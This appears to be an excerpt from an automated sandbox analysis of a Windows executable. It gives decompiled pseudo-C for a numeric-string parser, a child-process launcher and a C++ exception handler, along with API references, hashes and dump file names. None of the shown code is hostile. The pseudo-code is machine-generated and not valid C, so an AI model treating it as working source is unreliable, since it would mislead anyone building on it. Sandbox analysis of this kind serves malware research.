Instruction Fuzzy Hash: A841F712B18AAA46EB11AF11A82027AA6B0BB49BE4F444030DD7D477C5FE3CE505C7F5

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E0178 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00007FF77FF7DA8E0178(signed short* __rax, long long __rbx, long long __rcx, signed short** __rdx, void* __r8, long long __r10, void* __r11, long long _a8, intOrPtr _a16, long long _a24) {
				void* _v64;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				char _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				long long _v176;
				long long _v184;
				void* __rsi;
				void* __rbp;
				signed int _t144;
				void* _t162;
				signed short _t206;
				signed short _t207;
				signed int _t208;
				signed int _t240;
				intOrPtr _t254;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t263;
				signed short* _t380;
				signed short* _t381;
				signed short* _t383;
				signed short** _t384;
				long long _t385;
				long long* _t388;
				signed short* _t389;
				signed short* _t390;
				signed short** _t394;
				long long* _t395;
				long long* _t396;
				signed short** _t397;
				void* _t398;
				void* _t399;
				signed short* _t404;
				signed short* _t405;
				void* _t407;
				long long _t408;
				signed short* _t409;
				intOrPtr _t410;

				_t407 = __r11;
				_t403 = __r8;
				_t394 = __rdx;
				_t385 = __rbx;
				_a24 = __rbx;
				_a8 = __rcx;
				_t408 =  *__rdx;
				r10d = 0;
				_v64 = _t408;
				r15d = r8d;
				_t397 = __rdx;
				if (_t408 != 0) goto 0xda8e01bf;
				E00007FF77FF7DA8E4394(__rax);
				 *__rax = 0x16;
				E00007FF77FF7DA8E9D00();
				goto 0xda8e01f1;
				if (r15d == 0) goto 0xda8e0209;
				_t4 = _t403 - 2; // 0xe
				if (_t4 - 0x22 <= 0) goto 0xda8e0209;
				_v176 = __rcx;
				r9d = 0;
				 *((char*)(__rcx + 0x30)) = 1;
				r8d = 0;
				 *(__rcx + 0x2c) = 0x16;
				_v184 = __r10;
				E00007FF77FF7DA8E9C34(__rax, __rbx, __rcx, __rdx, _t398, _t399, __r8);
				_t388 = _t397[1];
				if (_t388 == 0) goto 0xda8e0839;
				 *_t388 =  *_t397;
				goto 0xda8e0839;
				_t10 = _t408 + 2; // 0x2
				_t389 = _t10;
				_t144 = r9b & 0xffffffff;
				r14d = r10d;
				 *_t394 = _t389;
				_t262 =  !=  ? _t144 : _t144 | 0x00000002;
				if ((0x0000fffd & _t385 - 0x0000002b) != 0) goto 0xda8e0240;
				_t206 =  *_t389 & 0x0000ffff;
				_t14 =  &(_t389[1]); // 0x4
				_t380 = _t14;
				 *_t397 = _t380;
				_a16 = 0x9f0;
				_v168 = 0xa66;
				_v164 = 0xa70;
				_v160 = 0xae6;
				r8d = 0x660;
				_v156 = 0xaf0;
				_t20 = _t380 - 0x80; // 0x5e0
				r11d = _t20;
				_v152 = 0xb66;
				r9d = 0x6f0;
				_v148 = 0xb70;
				_v144 = 0xc66;
				_v140 = 0xc70;
				_v136 = 0xce6;
				_v132 = 0xcf0;
				_v128 = 0xd66;
				_v124 = 0xd70;
				_v120 = 0xe50;
				_v116 = 0xe5a;
				_v112 = 0xed0;
				_v108 = 0xeda;
				_v104 = 0xf20;
				_v100 = 0xf2a;
				_v96 = 0x1040;
				_v92 = 0x104a;
				_v88 = 0x17e0;
				_v84 = 0x17ea;
				_v80 = 0x1810;
				_v76 = 0xff1a;
				_v72 = 0x19;
				if ((r15d & 0xffffffef) != 0) goto 0xda8e05ab;
				if (_t206 - 0x30 < 0) goto 0xda8e0517;
				if (_t206 - 0x3a >= 0) goto 0xda8e0367;
				goto 0xda8e0512;
				if (_t206 - 0xff10 >= 0) goto 0xda8e0503;
				if (_t206 - r8w < 0) goto 0xda8e0517;
				if (_t206 - 0x66a >= 0) goto 0xda8e038f;
				goto 0xda8e0512;
				if (_t206 - r9w < 0) goto 0xda8e0517;
				if (_t206 - 0x6fa >= 0) goto 0xda8e03ae;
				goto 0xda8e0512;
				if (_t206 - r11w < 0) goto 0xda8e0517;
				if (_t206 - 0x970 >= 0) goto 0xda8e03cd;
				goto 0xda8e0512;
				if (_t206 - (_t206 & 0x0000ffff) - r11d < 0) goto 0xda8e0517;
				if (_t206 - _a16 >= 0) goto 0xda8e03ed;
				goto 0xda8e0512;
				if (_t206 - _v168 < 0) goto 0xda8e0517;
				if (_t206 - _v164 < 0) goto 0xda8e035d;
				_t47 =  &_v160; // 0xae6
				if (_t206 -  *_t47 < 0) goto 0xda8e0517;
				if (_t206 - _v156 < 0) goto 0xda8e035d;
				if (_t206 - _v152 < 0) goto 0xda8e0517;
				if (_t206 - _v148 < 0) goto 0xda8e035d;
				if (_t206 - _v144 < 0) goto 0xda8e0517;
				if (_t206 - _v140 < 0) goto 0xda8e035d;
				if (_t206 - _v136 < 0) goto 0xda8e0517;
				if (_t206 - _v132 < 0) goto 0xda8e035d;
				if (_t206 - _v128 < 0) goto 0xda8e0517;
				if (_t206 - _v124 < 0) goto 0xda8e035d;
				if (_t206 - _v120 < 0) goto 0xda8e0517;
				if (_t206 - _v116 < 0) goto 0xda8e035d;
				if (_t206 - _v112 < 0) goto 0xda8e0517;
				if (_t206 - _v108 < 0) goto 0xda8e035d;
				if (_t206 - _v104 < 0) goto 0xda8e0517;
				if (_t206 - _v100 < 0) goto 0xda8e035d;
				if (_t206 - _v96 < 0) goto 0xda8e0517;
				if (_t206 - _v92 < 0) goto 0xda8e035d;
				if (_t206 - _v88 < 0) goto 0xda8e0517;
				if (_t206 - _v84 < 0) goto 0xda8e035d;
				if ((_t206 & 0x0000ffff) - _v80 - 9 > 0) goto 0xda8e0517;
				goto 0xda8e035d;
				if (_t206 - _v76 >= 0) goto 0xda8e0517;
				if ((_t206 & 0x0000ffff) - 0xff10 != 0xffffffff) goto 0xda8e0539;
				_t254 = _v72;
				_t70 = _t389 - 0x41; // 0x6af
				_t71 = _t389 - 0x61; // 0x68f
				_t162 = _t71;
				if (_t70 - _t254 <= 0) goto 0xda8e052f;
				if (_t162 - _t254 > 0) goto 0xda8e059c;
				if (_t162 - _t254 > 0) goto 0xda8e0536;
				_t72 = _t389 - 0x37; // 0x5d9
				if (_t72 != 0) goto 0xda8e059c;
				_t390 =  *_t397;
				r9d = 0xffdf;
				_t255 =  *_t390 & 0x0000ffff;
				_t73 =  &(_t390[1]); // 0xffe1
				_t404 = _t73;
				 *_t397 = _t404;
				_t74 = _t394 - 0x58; // -63
				if ((r9w & _t74) == 0) goto 0xda8e058a;
				 *_t397 = _t390;
				_t166 =  !=  ? r15d : 8;
				r15d =  !=  ? r15d : 8;
				if (_t255 == 0) goto 0xda8e05ab;
				if ( *_t390 == _t255) goto 0xda8e05ab;
				E00007FF77FF7DA8E4394(_t380);
				 *_t380 = 0x16;
				E00007FF77FF7DA8E9D00();
				r10d = 0;
				goto 0xda8e05ab;
				_t207 =  *_t404 & 0x0000ffff;
				_t77 =  &(_t404[1]); // 0xffe3
				_t381 = _t77;
				 *_t397 = _t381;
				goto 0xda8e05a1;
				_t171 =  !=  ? r15d : 0xa;
				r15d = 0xa;
				_t172 = ( !=  ? r15d : 0xa) | 0xffffffff;
				_t79 = (( !=  ? r15d : 0xa) | 0xffffffff) % r15d;
				_t257 = (( !=  ? r15d : 0xa) | 0xffffffff) % r15d;
				r11d = 0x61;
				r9d = 0xa / r15d;
				r12d = 0xff10;
				_t82 = _t407 - 0x31; // 0x5af
				r13d = _t82;
				if (_t207 - r13w < 0) goto 0xda8e077a;
				if (_t207 - 0x3a >= 0) goto 0xda8e05e6;
				goto 0xda8e0775;
				if (_t207 - r12w >= 0) goto 0xda8e0765;
				if (_t207 - 0x660 < 0) goto 0xda8e077a;
				if (_t207 - 0x66a >= 0) goto 0xda8e060d;
				goto 0xda8e0775;
				if (_t207 - 0x6f0 < 0) goto 0xda8e077a;
				_t83 =  &(_t381[5]); // 0x6fa
				if (_t207 - _t83 >= 0) goto 0xda8e062d;
				goto 0xda8e0775;
				if (_t207 - 0x966 < 0) goto 0xda8e077a;
				_t84 =  &(_t381[5]); // 0x970
				if (_t207 - _t84 < 0) goto 0xda8e0623;
				_t85 =  &(_t390[0x3b]); // 0x9e6
				if (_t207 - _t85 < 0) goto 0xda8e077a;
				if (_t207 - _a16 < 0) goto 0xda8e0623;
				if (_t207 - _v168 < 0) goto 0xda8e077a;
				if (_t207 - _v164 < 0) goto 0xda8e0623;
				if (_t207 - _v160 < 0) goto 0xda8e077a;
				if (_t207 - _v156 < 0) goto 0xda8e0623;
				if (_t207 - _v152 < 0) goto 0xda8e077a;
				if (_t207 - _v148 < 0) goto 0xda8e0623;
				if (_t207 - _v144 < 0) goto 0xda8e077a;
				if (_t207 - _v140 < 0) goto 0xda8e0623;
				if (_t207 - _v136 < 0) goto 0xda8e077a;
				if (_t207 - _v132 < 0) goto 0xda8e0623;
				if (_t207 - _v128 < 0) goto 0xda8e077a;
				if (_t207 - _v124 < 0) goto 0xda8e0623;
				if (_t207 - _v120 < 0) goto 0xda8e077a;
				if (_t207 - _v116 < 0) goto 0xda8e0623;
				if (_t207 - _v112 < 0) goto 0xda8e077a;
				if (_t207 - _v108 < 0) goto 0xda8e0623;
				if (_t207 - _v104 < 0) goto 0xda8e077a;
				if (_t207 - _v100 < 0) goto 0xda8e0623;
				if (_t207 - _v96 < 0) goto 0xda8e077a;
				if (_t207 - _v92 < 0) goto 0xda8e0623;
				if (_t207 - _v88 < 0) goto 0xda8e077a;
				if (_t207 - _v84 < 0) goto 0xda8e0623;
				if ((_t207 & 0x0000ffff) - _v80 - 9 > 0) goto 0xda8e077a;
				goto 0xda8e0775;
				if (_t207 - _v76 >= 0) goto 0xda8e077a;
				if ((_t207 & 0x0000ffff) - r12d != 0xffffffff) goto 0xda8e07ae;
				_t240 = _t207 & 0x0000ffff;
				if (_t240 - 0x41 < 0) goto 0xda8e0787;
				if (_t240 - 0x5a <= 0) goto 0xda8e0792;
				if (_t240 - r11d < 0) goto 0xda8e07ab;
				if (_t207 - 0x7a > 0) goto 0xda8e07ab;
				if ((_t207 & 0x0000ffff) - r11w - _v72 > 0) goto 0xda8e07a6;
				goto 0xda8e07ae;
				_t405 =  *_t397;
				if ((_t240 + 0x1ffffffa9 | 0xffffffff) - r15d >= 0) goto 0xda8e07ee;
				_t208 =  *_t405 & 0x0000ffff;
				_t259 = _t381 + _t390;
				r14d = _t259;
				_t117 =  &(_t405[1]); // 0x12
				 *_t397 = _t117;
				_t263 = ( !=  ? _t144 : _t144 | 0x00000002) | (r10d & 0xffffff00 | _t259 - r14d * r15d > 0x00000000 | r10d & 0xffffff00 | r14d - r9d > 0x00000000) << 0x00000002 | 0x00000008;
				goto 0xda8e05cb;
				_t409 = _v64;
				_t119 = _t405 - 2; // 0xe
				_t383 = _t119;
				_t410 = _a8;
				 *_t397 = _t383;
				if (_t208 == 0) goto 0xda8e0824;
				if ( *_t383 == _t208) goto 0xda8e0824;
				E00007FF77FF7DA8E4394(_t383);
				 *_t383 = 0x16;
				E00007FF77FF7DA8E9D00();
				if ((sil & 0x00000008) != 0) goto 0xda8e0840;
				_t384 = _t397[1];
				 *_t397 = _t409;
				if (_t384 == 0) goto 0xda8e0839;
				 *_t384 = _t409;
				goto 0xda8e08d2;
				r8d = 0x80000000;
				_t124 = _t405 - 1; // 0xf
				r9d = _t124;
				if ((sil & 0x00000004) == 0) goto 0xda8e0859;
				goto 0xda8e0877;
				if ((sil & 0x00000001) == 0) goto 0xda8e08b8;
				if ((bpl & sil) == 0) goto 0xda8e086b;
				if (r14d - r8d <= 0) goto 0xda8e08bd;
				goto 0xda8e0870;
				if (r14d - r9d <= 0) goto 0xda8e08c0;
				 *((char*)(_t410 + 0x30)) = 1;
				 *((intOrPtr*)(_t410 + 0x2c)) = 0x22;
				if ((_t263 & 0x00000001) != 0) goto 0xda8e0890;
				r14d = r14d | 0xffffffff;
				goto 0xda8e08c0;
				_t395 = _t397[1];
				if ((0x00000002 & _t263) == 0) goto 0xda8e08a8;
				if (_t395 == 0) goto 0xda8e08a3;
				 *_t395 =  *_t397;
				goto 0xda8e08d2;
				if (_t395 == 0) goto 0xda8e08b3;
				 *_t395 =  *_t397;
				goto 0xda8e08d2;
				if ((bpl & sil) == 0) goto 0xda8e08c0;
				r14d =  ~r14d;
				_t396 = _t397[1];
				if (_t396 == 0) goto 0xda8e08cf;
				 *_t396 =  *_t397;
				return r14d;
			}

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E01B8
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E0580
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E081F

Strings

f, xrefs: 00007FF7DA8E0405
p, xrefs: 00007FF7DA8E02C2
f, xrefs: 00007FF7DA8E0250
p, xrefs: 00007FF7DA8E025D
f, xrefs: 00007FF7DA8E02BA

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
Instruction ID: 2626698016375ed4ef662938865a372bb064202d945700eb323fef4a9af06217
Opcode Fuzzy Hash: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
Instruction Fuzzy Hash: 4912B261E4C1C3C6FB216A14A41437DE271FBA0751FC84877EED9465C6DB3EEAA08B60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D6F50 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84
processsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E00007FF77FF7DA8D6F50(void* __rax, long long __rbx, void* __rcx, long long _a16, short _a24, intOrPtr _a32, long long _a40, long long _a48, long long _a56, long long _a64, intOrPtr _a72, char _a80, long long _a88, short _a96, char _a104, char _a136, long long _a144, intOrPtr _a196, short _a200, signed long long _a216, signed long long _a224, signed long long _a232, char _a248, signed int _a8440, void* _a8480) {
				signed long long _t67;
				signed long long _t68;
				long long _t90;
				void* _t91;
				void* _t92;
				void* _t95;
				void* _t97;
				void* _t98;
				void* _t99;

				_a16 = __rbx;
				E00007FF77FF7DA8DAD20(0x2110, __rax, _t98, _t99);
				_t67 =  *0xda90d008; // 0xe3add53f52b8
				_t68 = _t67 ^ _t92 - __rax;
				_a8440 = _t68;
				_a72 = 0;
				r8d = 0x1000;
				E00007FF77FF7DA8D79A0(_t68, __rbx,  &_a248, __rcx, _t91, _t95);
				SetConsoleCtrlHandler(??, ??);
				_a80 = 0x18;
				_a88 = _t90;
				_a96 = 1;
				GetStartupInfoW(??);
				asm("xorps xmm0, xmm0");
				_a144 = _t90;
				asm("movdqa [esp+0xa0], xmm0");
				_a196 = 0x101;
				_a200 = 1;
				E00007FF77FF7DA8E41C0(0, _t68);
				E00007FF77FF7DA8E6E48(E00007FF77FF7DA8E90D4(_t68, _t68), _t68);
				_a216 = _t68;
				E00007FF77FF7DA8E41C0(1, _t68);
				E00007FF77FF7DA8E6E48(E00007FF77FF7DA8E90D4(_t68, _t68), _t68);
				_t14 = _t90 + 2; // 0x2
				_a224 = _t68;
				E00007FF77FF7DA8E41C0(_t14, _t68);
				E00007FF77FF7DA8E6E48(E00007FF77FF7DA8E90D4(_t68, _t68), _t68);
				_a232 = _t68;
				GetCommandLineW();
				r9d = 0;
				_a64 =  &_a104;
				_a56 =  &_a136;
				_a48 = _t90;
				_a40 = _t90;
				_a32 = 0;
				_a24 = 1;
				if (CreateProcessW(??, ??, ??, ??, ??, ??, ??, ??, ??, ??) == 0) goto 0xda8d70b8;
				WaitForSingleObject(??, ??);
				GetExitCodeProcess(??, ??);
				goto 0xda8d70d0;
				E00007FF77FF7DA8D2620(CreateProcessW(??, ??, ??, ??, ??, ??, ??, ??, ??, ??),  &_a136, "CreateProcessW", "Error creating child process!\n",  &_a80, _t97);
				return E00007FF77FF7DA8DACF0(0xffffffff, _t44, _a8440 ^ _t92 - __rax);
			}

0x7ff7da8d6f50
0x7ff7da8d6f5b
0x7ff7da8d6f63
0x7ff7da8d6f6a
0x7ff7da8d6f6d
0x7ff7da8d6f82
0x7ff7da8d6f86
0x7ff7da8d6f8c
0x7ff7da8d6f9f
0x7ff7da8d6fad
0x7ff7da8d6fb5
0x7ff7da8d6fba
0x7ff7da8d6fbe
0x7ff7da8d6fc4
0x7ff7da8d6fc7
0x7ff7da8d6fd1
0x7ff7da8d6fda
0x7ff7da8d6fe5
0x7ff7da8d6fed
0x7ff7da8d6ffc
0x7ff7da8d7003
0x7ff7da8d700b
0x7ff7da8d701a
0x7ff7da8d701f
0x7ff7da8d7022
0x7ff7da8d702a
0x7ff7da8d7039
0x7ff7da8d703e
0x7ff7da8d7046
0x7ff7da8d704c
0x7ff7da8d7064
0x7ff7da8d7071
0x7ff7da8d7076
0x7ff7da8d707b
0x7ff7da8d7080
0x7ff7da8d7084
0x7ff7da8d7090
0x7ff7da8d709c
0x7ff7da8d70ac
0x7ff7da8d70b6
0x7ff7da8d70c6
0x7ff7da8d70f0

APIs

Part of subcall function 00007FF7DA8D79A0: MultiByteToWideChar.KERNEL32 ref: 00007FF7DA8D79DA

SetConsoleCtrlHandler.KERNEL32(00000000,00007FF7DA8D3A10), ref: 00007FF7DA8D6F9F
GetStartupInfoW.KERNEL32 ref: 00007FF7DA8D6FBE

Part of subcall function 00007FF7DA8E90D4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E90E8

Part of subcall function 00007FF7DA8E6E48: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E6EAF

GetCommandLineW.KERNEL32 ref: 00007FF7DA8D7046
CreateProcessW.KERNEL32 ref: 00007FF7DA8D7088
WaitForSingleObject.KERNEL32 ref: 00007FF7DA8D709C
GetExitCodeProcess.KERNEL32 ref: 00007FF7DA8D70AC

Strings

Error creating child process!, xrefs: 00007FF7DA8D70B8
CreateProcessW, xrefs: 00007FF7DA8D70BF

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
String ID: CreateProcessW$Error creating child process!
API String ID: 2895956056-3524285272
Opcode ID: a68fb7304a42ac273bc53bf185094bfbd624d4ea67b8908c2ccc1c8bf35a7020
Instruction ID: fe290bdd321b5e6ad29992a19bfce8018d0919ed447951aab990f5a979b7050a
Opcode Fuzzy Hash: a68fb7304a42ac273bc53bf185094bfbd624d4ea67b8908c2ccc1c8bf35a7020
Instruction Fuzzy Hash: 03413F32A0878286EA11AB60F4452AEF7A4FFE4350FD00576EA8D43B96DF7CD1648B50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8DDB90 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00007FF77FF7DA8DDB90(intOrPtr __ecx, void* __edx, void* __esi, intOrPtr* __rcx, long long __rdx, long long __r8, long long __r9, void* __r10) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int* _t128;
				void* _t145;
				intOrPtr _t146;
				intOrPtr _t154;
				void* _t173;
				intOrPtr _t176;
				signed int _t177;
				signed int _t178;
				void* _t209;
				signed long long _t219;
				signed long long _t220;
				signed long long _t226;
				long long _t228;
				signed int _t235;
				intOrPtr* _t236;
				intOrPtr* _t237;
				signed long long _t246;
				long long _t267;
				signed int* _t280;
				long long _t281;
				void* _t282;
				void* _t283;
				signed long long _t284;
				long long _t296;
				signed int _t307;
				unsigned long long _t313;

				_t180 = __esi;
				_t282 = _t283 - 0x28;
				_t284 = _t283 - 0x128;
				_t219 =  *0xda90d008; // 0xe3add53f52b8
				_t220 = _t219 ^ _t284;
				 *(_t282 + 0x10) = _t220;
				_t280 =  *((intOrPtr*)(_t282 + 0x90));
				_t307 =  *((intOrPtr*)(_t282 + 0xa8));
				 *((long long*)(_t284 + 0x68)) = __r8;
				_t236 = __rcx;
				 *((long long*)(_t284 + 0x78)) = __rdx;
				 *(_t282 - 0x68) = _t307;
				 *((char*)(_t284 + 0x60)) = 0;
				_t281 = __r9;
				_t128 = E00007FF77FF7DA8DEAF0(__ecx, __esi, __rcx, __rdx, __r9, __r9, _t282, _t280, __r9);
				r14d = _t128;
				if (_t128 - 0xffffffff < 0) goto 0xda8de05f;
				if (_t128 - _t280[1] >= 0) goto 0xda8de05f;
				if ( *_t236 != 0xe06d7363) goto 0xda8ddcdc;
				if ( *((intOrPtr*)(_t236 + 0x18)) != 4) goto 0xda8ddcdc;
				if ( *((intOrPtr*)(_t236 + 0x20)) - 0x19930520 - 2 > 0) goto 0xda8ddcdc;
				if ( *((long long*)(_t236 + 0x30)) != 0) goto 0xda8ddcdc;
				E00007FF77FF7DA8DCC80(_t220);
				if ( *((long long*)(_t220 + 0x20)) == 0) goto 0xda8ddff8;
				E00007FF77FF7DA8DCC80(_t220);
				_t237 =  *((intOrPtr*)(_t220 + 0x20));
				E00007FF77FF7DA8DCC80(_t220);
				 *((char*)(_t284 + 0x60)) = 1;
				 *((long long*)(_t284 + 0x68)) =  *((intOrPtr*)(_t220 + 0x28));
				E00007FF77FF7DA8DD650(_t220,  *((intOrPtr*)(_t237 + 0x38)));
				if ( *_t237 != 0xe06d7363) goto 0xda8ddc94;
				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0xda8ddc94;
				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0xda8ddc94;
				if ( *((long long*)(_t237 + 0x30)) == 0) goto 0xda8de05f;
				E00007FF77FF7DA8DCC80(_t220);
				if ( *(_t220 + 0x38) == 0) goto 0xda8ddcdc;
				E00007FF77FF7DA8DCC80(_t220);
				E00007FF77FF7DA8DCC80(_t220);
				 *(_t220 + 0x38) =  *(_t220 + 0x38) & 0x00000000;
				if (E00007FF77FF7DA8DEB88(_t220, _t237, _t237,  *(_t220 + 0x38), __r9) != 0) goto 0xda8ddcd7;
				if (E00007FF77FF7DA8DEC78(_t220, _t237,  *(_t220 + 0x38), __r9, _t282) == 0) goto 0xda8de03c;
				goto 0xda8de018;
				 *((long long*)(_t282 - 0x40)) =  *((intOrPtr*)(__r9 + 8));
				 *(_t282 - 0x48) = _t280;
				if ( *_t237 != 0xe06d7363) goto 0xda8ddfaf;
				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0xda8ddfaf;
				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0xda8ddfaf;
				r15d = 0;
				if (_t280[3] - r15d <= 0) goto 0xda8ddee0;
				 *(_t284 + 0x28) =  *(_t282 + 0xa0);
				 *(_t284 + 0x20) = _t280;
				r8d = r14d;
				_t145 = E00007FF77FF7DA8DD33C(_t237, _t282 - 0x28, _t282 - 0x48, __r9, _t282, _t280, __r9, __r10);
				asm("movups xmm0, [ebp-0x28]");
				asm("movdqu [ebp-0x38], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("movd eax, xmm0");
				if (_t145 -  *((intOrPtr*)(_t282 - 0x10)) >= 0) goto 0xda8ddee0;
				_t296 =  *((intOrPtr*)(_t282 - 0x28));
				r13d =  *((intOrPtr*)(_t282 - 0x30));
				 *((long long*)(_t282 - 0x80)) = _t296;
				_t146 = r13d;
				asm("inc ecx");
				 *((intOrPtr*)(_t282 - 0x50)) = __ecx;
				asm("movd eax, xmm0");
				asm("movups [ebp-0x60], xmm0");
				if (_t146 - r14d > 0) goto 0xda8dded3;
				_t226 =  *(_t282 - 0x60) >> 0x20;
				if (r14d - _t146 > 0) goto 0xda8dded3;
				r12d = r15d;
				_t267 =  *((intOrPtr*)( *((intOrPtr*)( *( *(_t282 - 0x38)) + 0x10)) + ( *( *(_t282 - 0x38)) +  *( *(_t282 - 0x38)) * 4) * 4 +  *((intOrPtr*)(_t296 + 8)) + 0x10)) +  *((intOrPtr*)(__r9 + 8));
				_t313 =  *(_t282 - 0x58) >> 0x20;
				 *((long long*)(_t282 - 0x70)) = _t267;
				if (r15d == 0) goto 0xda8ddec0;
				_t246 = _t226 + _t226 * 4;
				asm("movups xmm0, [edx+ecx*4]");
				asm("movups [ebp-0x8], xmm0");
				_t59 = _t246 * 4; // 0x48ccccc35f40c483
				 *((intOrPtr*)(_t282 + 8)) =  *((intOrPtr*)(_t267 + _t59 + 0x10));
				E00007FF77FF7DA8DD624(_t226);
				_t228 = _t226 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc));
				 *((long long*)(_t284 + 0x70)) = _t228;
				E00007FF77FF7DA8DD624(_t228);
				_t176 =  *((intOrPtr*)(_t228 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc))));
				 *((intOrPtr*)(_t284 + 0x64)) = _t176;
				if (_t176 <= 0) goto 0xda8dde50;
				E00007FF77FF7DA8DD624(_t228);
				 *((long long*)(_t282 - 0x78)) = _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70))));
				if (E00007FF77FF7DA8DE284(_t180, _t237, _t282 - 8, _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70)))), _t280, __r9,  *((intOrPtr*)(_t237 + 0x30))) != 0) goto 0xda8dde61;
				 *((long long*)(_t284 + 0x70)) =  *((long long*)(_t284 + 0x70)) + 4;
				_t154 =  *((intOrPtr*)(_t284 + 0x64)) - 1;
				 *((intOrPtr*)(_t284 + 0x64)) = _t154;
				if (_t154 > 0) goto 0xda8dde14;
				r12d = r12d + 1;
				if (r12d == r15d) goto 0xda8ddec7;
				goto 0xda8dddcd;
				 *((char*)(_t284 + 0x58)) =  *((intOrPtr*)(_t282 + 0x98));
				 *(_t284 + 0x50) =  *((intOrPtr*)(_t284 + 0x60));
				 *((long long*)(_t284 + 0x48)) =  *(_t282 - 0x68);
				 *(_t284 + 0x40) =  *(_t282 + 0xa0);
				 *(_t284 + 0x38) = _t282 - 0x60;
				 *(_t284 + 0x30) =  *((intOrPtr*)(_t282 - 0x78));
				 *(_t284 + 0x28) = _t282 - 8;
				 *(_t284 + 0x20) = _t280;
				E00007FF77FF7DA8DDABC(_t180, _t237, _t237,  *((intOrPtr*)(_t284 + 0x78)),  *((intOrPtr*)(_t284 + 0x68)), _t281);
				goto 0xda8ddecc;
				goto 0xda8dded0;
				r15d = 0;
				r13d = r13d + 1;
				if (r13d -  *((intOrPtr*)(_t282 - 0x10)) < 0) goto 0xda8ddd65;
				if (( *_t280 & 0x1fffffff) - 0x19930521 < 0) goto 0xda8ddfec;
				_t209 = _t280[8] - r15d;
				if (_t209 == 0) goto 0xda8ddf06;
				E00007FF77FF7DA8DD610(_t282 - 8);
				if (_t209 != 0) goto 0xda8ddf27;
				if ((_t280[9] >> 0x00000002 & 0x00000001) == 0) goto 0xda8ddfec;
				if (E00007FF77FF7DA8DD1E0(_t280[9] >> 0x00000002 & 0x00000001, _t282 - 8 + _t280[8], _t281, _t280) != 0) goto 0xda8ddfec;
				if ((_t280[9] >> 0x00000002 & 0x00000001) != 0) goto 0xda8de042;
				if (_t280[8] == r15d) goto 0xda8ddf4c;
				E00007FF77FF7DA8DD610(_t282 - 8 + _t280[8]);
				_t235 = _t280[8];
				goto 0xda8ddf4f;
				if (E00007FF77FF7DA8DEB88(_t235, _t237, _t237, _t313, _t281) != 0) goto 0xda8ddfec;
